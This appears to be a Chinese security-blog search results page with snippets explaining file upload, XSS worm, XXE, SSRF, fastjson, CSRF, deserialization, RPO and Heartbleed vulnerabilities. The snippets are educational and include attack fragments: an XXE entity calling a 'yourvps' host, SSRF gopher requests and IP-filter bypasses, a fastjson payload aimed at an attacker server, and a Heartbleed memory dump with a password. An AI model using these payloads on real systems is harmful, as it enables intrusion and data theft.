首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏渗透测试专栏

    渗透测试文件上传漏洞原理与验证(7)——上传漏洞防御

    上传漏洞防御原则核心思想确保上传的文件不会被服务器解析成可执行的脚本,进而引发偏离功能设计的意外后果。 2、确保web server版本为最新,防止由于web server漏洞造成的文件意外解析3、部分文件上传攻击会配合本地其他漏洞进行,所以也要保证web服务器减少其他可利用漏洞。 IIS6.0文件解析漏洞升级IIS版本,IIS5.1与7.5均无此漏洞Apache文件解析漏洞不要使用AddHandler , 改用SetHandler , 写好正则 , 就不会有解析问题<FilesMatch >Require all denied</FilesMatch>Nginx文件解析漏洞1.将php.ini文件中的cgi.fix_pathinfo的值设为0。 Tomcat任意文件上传漏洞1、Tomcat任意文件上传漏洞环境较为苛刻,将Tomcat、jdk、php更新。2、避免开启可、通过 PUT 方式创建 JSP 文件的功能。

    99221编辑于 2024-12-05
  • 来自专栏渗透测试专栏

    渗透测试XSS漏洞原理与验证(7)——XSS Worm

    蠕虫利用站点页面的XSS漏洞根据其特定规则进行传播和感染。 值得注意的是,XSS蠕虫只是Web 2.0蠕虫的其中一种,也是最广为人知的一种它利用网站的XSS漏洞进行散播。 Web2.0蠕虫还有其他形式,如CSRF Worm,顾名思义,该类蠕虫是利用网站的CSRF漏洞进行攻击。 蠕虫攻击流程 1、攻击者发现目标网站存在XSS漏洞,并且可以编写XSS蠕虫; 2、利用一个宿主(如博客空间)作为传播源头进行XSS攻击; 3、当其他用户访问被感染的空间时,XSS蠕虫执行以下操作: 判断用户是否登录 test.indexof('d',1)=2 //从前向后定位d 从第二个字符串开始,第一次出现的位置 test.indexof('d',5,2)=6 //从前向后定位d 从第5位开始向后查2位,即查询第5~7位 这次漏洞的成因是因为新浪对参数g完全没有过滤,这次攻击在Chrome、Safari中会被XSS Filter拦截,而IE、Firefox未能幸免。

    55110编辑于 2024-11-09
  • 来自专栏全栈程序员必看

    XXE漏洞原理

    XXE漏洞是XML外部实体注入漏洞,那什么是外部实体呢? ---- XML DTD 1、文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 Ps:第二条是重点,也是XXE漏洞产生的原因,DTD可以定义外部实体并引用 DTD语法 若DTD要在XML文档中使用,他需要包含在·DOCTYPE声明中 语法 <! etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False)) 白名单过滤 ---- 判断是否存在XXE漏洞 ENTITY playwin SYSTEM "http://yourvps/xx.txt"> ]> <root>&playwin;</root> 解析成功,说明有XXE漏洞

    97320编辑于 2022-08-25
  • 来自专栏网络安全攻防

    RFD漏洞原理浅析

    基本介绍 RFD(Reflected File Download)即反射型文件下载漏洞,2014年在BlackHat中被提出,该漏洞原理上类似XSS,在危害上类似DDE,攻击者可以通过一个URL地址使用户下载一个恶意文件 ,从而危害用户的终端PC,不过这个漏洞很罕见,大多数公司会认为它是一个需要结合社工的低危漏洞,但微软,雅虎,eBay,PayPal和其他许多公司认为这是一个中危漏洞 漏洞原理 下面从一个实例理解RDF漏洞 根据漏洞触发的三个条件挖掘漏洞: 输入反射:用户输入被"反射"到响应内容 文件名可控:URL允许接受用户的其他输入,攻击者将其用于把文件扩展名设置为可执行扩展名 诱导下载操作:响应被作为文件里内容进行下载 11中命中JSON/JSONP API URL,我们可以看到响应将以somefileName.json的形式下载,文件名主要取决于http Content-Disposition标头和URL,而要利用此漏洞 gs_ri=psy-ab&q=%22%7c%7c%74….

    58210编辑于 2024-04-28
  • 来自专栏全栈程序员必看

    SSRF漏洞原理解析

    文章目录 0x01 基础知识 1、SSRF漏洞简介: 2、主要攻击方式: 3、漏洞形成原理: 4、漏洞的危害: 0x02 漏洞检测 1、漏洞验证: 2、漏洞的可能出现点: 0x03 绕过方法: 1、绕过限制为某种域名 url=gopher://127.0.0.1:2233/_test (向2233端口发送数据test,同样可以发送POST请求) ... 3、漏洞形成原理: 很多网站提供了从其他的服务器上获取数据的功能 (7)利用参数中的关键字查找: 关键字: share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain... 2、绕过限制请求IP不为内网地址: (1)采用短网址绕过 (2)利用特殊域名,xip.io可以指向任意域名(原理是DNS解析),即 127.0.0.1.xip.io,可以解析为127.0.0.1 (3) 1 会解析为 127.0.0.1 (7)采用302跳转 3、限制请求只为http协议: (1)采用302跳转 (2)采用短地址 0x04 漏洞利用 1、产生漏洞的函数: 根据后台使用的函数的不同,相应的影响和利用方法也不一样

    12K37编辑于 2022-09-12
  • 来自专栏漏洞知识库

    SSRF漏洞原理与利用

    漏洞知识库 网络安全/渗透测试/代码审计/ 关注 SSRF漏洞原理与利用 什么是SSRF? 内外网的端口和服务探测 主机本地敏感数据的读取 内外网主机应用程序漏洞的利用 …… 等等 怎么找到SSRF漏洞? 能够对外发起网络请求的地方,就可能存在SSRF漏洞 从远程服务器请求资源(Upload from URL,Import & Export RSS feed) 数据库内置功能(Oracle、MongoDB > SSRF漏洞的利用 访问URL: http://127.0.0.1/web/ssrf.php?url=www.baidu.com ? 912、902、3306端口 80:HTTP 8080:代理服务器端口(因为打开了BurpSuite) 912:虚拟机监听端口 902:Vmware使用的端口 3306:Mysql服务默认端口 SSRF漏洞修复建议

    2K20发布于 2019-11-20
  • fastjson漏洞原理与复现

    然后通过@type指定的内容来选择反序列化使用到的链为哪一条,那么我们通过此特性通过指定datasourcename参数为我们的恶意class类,从而导致命令执行 fastjson 1.2.24-rce漏洞复现 环境地址 https://github.com/vulhub/vulhub 启动环境 docker-compose up -d 漏洞复现 写入如下代码进入java文件保存为rce.java文件 import 192.168.13.106:9999/rce", "autoCommit":true } ​ } 如下图成功访问本地的rce.class文件 本地已执行命令 fastjson 1.2.47-rce漏洞复现 描述 该漏洞为1.2.24白名单限制,可绕过白名单限制进行命令执行(与1.2.24原理相同) 环境地址 https://github.com/vulhub/vulhub 启动环境 docker-compose up -d 漏洞复现 此漏洞复现方式与fastjson 1.2.24相似,所以我们直接给出payload,连marshalsec项目监听的服务和python监听的class文件的服务都不需要做任何更改

    68720编辑于 2024-03-23
  • 来自专栏全栈程序员必看

    xxe漏洞原理与防御

    xml基础知识 要了解xxe漏洞,那么一定得先明白基础知识,了解xml文档的基础组成。

    1.1K10编辑于 2022-08-31
  • 来自专栏IT技术(谌启梁)

    csrf漏洞原理及防御

    攻击原理 csrf.png 从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤 1.登录受信任网站A,并在本地生成Cookie 2.在不登出A的情况下,访问危险网站B 防御原理 csrf chapter=7_7&index=5 •https://pay.weixin.qq.com/wiki/doc/api/wxa/wxa_api.php?chapter=4_3

    2.2K00发布于 2019-08-27
  • 来自专栏山丘安全攻防实验室

    漏洞复现|文件上传漏洞利用方式与原理概述

    phpstudy下载地址:http://phpstudy.php.cn pikachu靶场下载地址:https://github.com/zhuifengshaonianhanlu/pikachu 文件上传漏洞 : 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。

    2.1K20发布于 2020-03-06
  • 来自专栏Mirror的技术成长

    文件包含漏洞原理浅探

    文件包含漏洞原理浅探 By : Mirror王宇阳 个人主页: https://www.cnblogs.com/wangyuyang1016/ 文件包含 文件包含是指一个文件里面包含另外一个文件 漏洞演示(本地执行) <?php include("phpinfo.txt"); ?> <?php phpinfo(); ?> ? 喏! PHP文件包含漏洞基本利用 读取敏感文件 构造类似http://127.0.0.1/?url=.\phpinfo.txt ? 喏!我们看见了文本内容,为什么呢? off函数为Off状态才可以使用,因为在On状态下%00会被转义导致无法截断;https://www.cnblogs.com/timelesszhuang/p/3726736.html PHP6/7关闭了 magic_quotes_gpc函数: PHP6\7关闭magic_quotes_gpc对程序的影响 文件包含的漏洞修复,尤其是include()相关文件包含函数,只要限制后缀名就好了?

    71120发布于 2020-11-12
  • 来自专栏氧化先生的专栏

    unlink漏洞原理和利用

    wonderkun 撰写 无回复 0x1 前言 网上关于unlink漏洞的文章已经非常多了,但是作为一个web狗,为了搞明白这个漏洞,还是花了好长时间,中间踩了几个坑,写这篇文章是希望跟我一样啃二进制的 在什么地址写,第二个.写入什么内容 addr就表示任意一个你想控制的可写地址 except value 是你想在addr中写入的值 下面就来看漏洞是怎么发生的,当我们free(Q)的时候,系统就发现Q堆块后面的 但是还需要注意:expect value +8 地址具有可写的权限,不会导致程序崩溃,这样就产生了一个任意地址写的漏洞。 0x5 分析unsafe unlink的代码,理解unlink漏洞 unsafe unlinke的代码在这里:https://github.com/Escapingbug/how2heap/blob/master ,最后一位为零表示上一个堆块是free状态,可以和它合并 最后完整的布局图如下: 4.在free(chunk1_ptr)之后,chunk0_ptr指向了&chunk0_ptr-3的地方 5.漏洞证明

    2.3K20发布于 2018-08-21
  • 来自专栏betasec

    PHP序列化漏洞原理

    本文作者:cream(贝塔安全实验室-核心成员) PHP序列化漏洞原理 1、序列化(串行化) 2、反序列化(反串行化) 3、序列化实例分析 4、反序列化实例分析 5、祸起萧墙---Magic函数 5.1 PHP反序列化漏洞CTF练习题 7、防御PHP序列化漏洞 1、序列化(串行化) 将变量转换为可保存或传输的字符串的过程; 2、反序列化(反串行化) 在适当的时候把这个字符串再转化成原来的变量使用。 成功读取到文件中的内容 6、实例讲解 6.1 CVE-2016-7124 触发该漏洞的PHP版本为PHP5小于5.6.25或PHP7小于7.0.10。 6.2.2 漏洞介绍和复现 Typecho博客软件存在反序列化导致任意代码执行漏洞,恶意访问者可以利用该漏洞无限制执行代码,获取webshell,存在高安全风险。 在源代码中可以看到flag{php_is_the_best_language} 7、防御PHP序列化漏洞 1.要严格控制unserialize函数的参数,坚持用户所输入的信息都是不可靠的原则 2.要对于

    2.2K10发布于 2020-07-31
  • 来自专栏网络安全攻防

    RPO漏洞原理深入刨析

    基本介绍 Gareth Heyes在2014年首次提出了一种新型攻击手法—RPO(Relative Path Overwrite)相对路径覆盖,该漏洞是一种利用相对URL路径覆盖目标文件的一种攻击手段, 其主要依赖于服务器和浏览器的解析差异性并利用前端代码中加载的css/js的相对路径来加载其他文件,最终使得浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生 原理概述 资源定位 资源的定位有相对路径和绝对路径两种方式,其中绝对路径以根目录为起点并完整地指定资源的路径,例如:http://www.example.com/index.html,其中"http: ,不再赘述) 原理分析 下面我们来分析一下上面的弹窗究竟是怎么实现的: Step 1:我们向服务器提交我们想请求的URL http://192.168.204.134/RPO/test/..%2findex.php /styles.css",浏览器认为还有另一个目录,但实际请求被发送到文档,这实际上就是RPO攻击的工作原理 执行案例2 RPO攻击并不仅限于诸如"styles.css"之类的相对URL,它还可以攻击诸如

    1.4K20编辑于 2023-12-04
  • 来自专栏十二惊惶的网络安全研究记录

    SSRF漏洞原理攻击与防御

    SSRF漏洞原理攻击与防御 前言:笔者对SSRF的进一步研究学习基于网络安全爱好者的兴趣,与白帽黑客的责任,仅在专业靶场和补天平台授权站点进行测试。 [TOC] SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个漏洞 一、SSRF漏洞原理: SSRF漏洞 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制 十六进制:0x7f.0.0.1。十进制:2130706433. web351 <? /flag.php 16 进制整数格式 url=http://0x7F000001/flag.php 短网址方式:127.0.0.1也可以写成127.1 用CIDR绕过localhost url=http > ctfshow{2abfc1df-79f7-49a9-b02a-d5d5908d150e} Web360 <?

    1.2K10编辑于 2024-02-28
  • 来自专栏代码审计

    逻辑漏洞原理及分析

    前言 之前的文章都是写的SQL注入,命令执行,文件上传等一步到位的高危漏洞原理及防御,接下来说一说逻辑漏洞,因为现在工具的大量使用,之前的那些主流漏洞,很难被轻易利用了,逻辑漏洞不一样,工具不会思考,所以应用程序有逻辑缺陷 ,工具很难发现,需要人为去挖掘,接下来就简单说一说,如何来进行逻辑漏洞的挖掘。 逻辑漏洞本质 web应用程序中的逻辑漏洞各不相同,有的很明显,有的很微妙。与SQL注入和跨站不同,逻辑漏洞没有共有的“签名”,定义特性是指应用程序执行的逻辑存在某种缺陷。 没有考虑如果发生X会怎么样,这种错误的假设会造成许多安全漏洞。逻辑漏洞是多样性的,挖掘它们需要从不同的角度思考问题,设法了解设计者和开发者做出的各种假设,然后考虑如何攻击。 常见的逻辑漏洞 一般哪些地方容易报出逻辑漏洞呢,比如,密码找回、交易支付、密码修改、突破限制等。 密码找回中的逻辑问题 关于密码找回的逻辑问题,我画了一个思维导图,把可能出现逻辑缺陷都写出来了。

    1.4K30发布于 2020-09-27
  • 来自专栏咸鱼不闲

    CSRF漏洞原理与防御

    原理 当你在浏览器上登录某网站后,cookie会保存登录的信息,这样在继续访问的时候不用每次都登录了,这个大家都知道。而CSRF就利用这个登陆态去发送恶意请求给后端。 CSRF攻击 知道了原理,攻击就变得好理解了,接着上面的例子, 我把请求地址改成评论本篇文章的url,参数为 “这篇文章写得6”, 在没有CSRF防御的情况下,我发表一个评论如:脱单秘笈:,后面附上这个脚本的链接

    1.1K30发布于 2020-06-29
  • 来自专栏用户2442861的专栏

    Nginx工作原理和优化、漏洞

    2、Nginx+FastCGI运行原理 Nginx不支持对外部程序的直接调用或者解析,所有的外部程序(包括PHP)必须通过FastCGI接口来调用。 /dev/poll – 高效的方法,使用于 Solaris 7 11/99+, HP/UX 11.22+ (eventport), IRIX 6.5.15+ 和 Tru64 UNIX 5.1A+. eventport Nginx的php漏洞 漏洞介绍:nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。 /dev/poll – 高效的方法,使用于 Solaris 7 11/99+, HP/UX 11.22+ (eventport), IRIX 6.5.15+ 和 Tru64 UNIX 5.1A+. eventport Nginx的php漏洞 漏洞介绍:nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。

    2.8K20发布于 2018-09-20
  • 来自专栏全栈程序员必看

    Heartbleed心脏出血漏洞原理分析

    Heartbleed心脏出血漏洞原理分析 2017年01月14日 18:14:25 阅读数:2718 1. 概述    OpenSSL在实现TLS和DTLS的心跳处理逻辑时,存在编码缺陷。 12 00 13 00 01 00 02 ……………. 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 ………#…… 01 6b 87 3c 2a f7 35 36 &password=123456 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..Accept-Encodin 67 3a 20 67 7a 68 2d pt-Language: zh- 43 4e 2c 7a 68 3b 71 3d 30 2e 38 0d 0a 0d 0a 9d CN,zh;q=0.8….. 47 d4 f2 b4 2e dc 63 f7 4c 28 bb 43 71 41 ca 00 G…..c.L(.CqA.. 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………

    1.6K10编辑于 2022-09-08
  • 来自专栏学习计划

    多线程7 ReentrantLock原理

    1.ReentrantLock加锁原理 1.第一个线程进来 FairSync里的lock方法 final void lock() { // 加锁成功后,修改的值 acquire(1); } 其抽象父类的方法

    41520发布于 2021-01-29
领券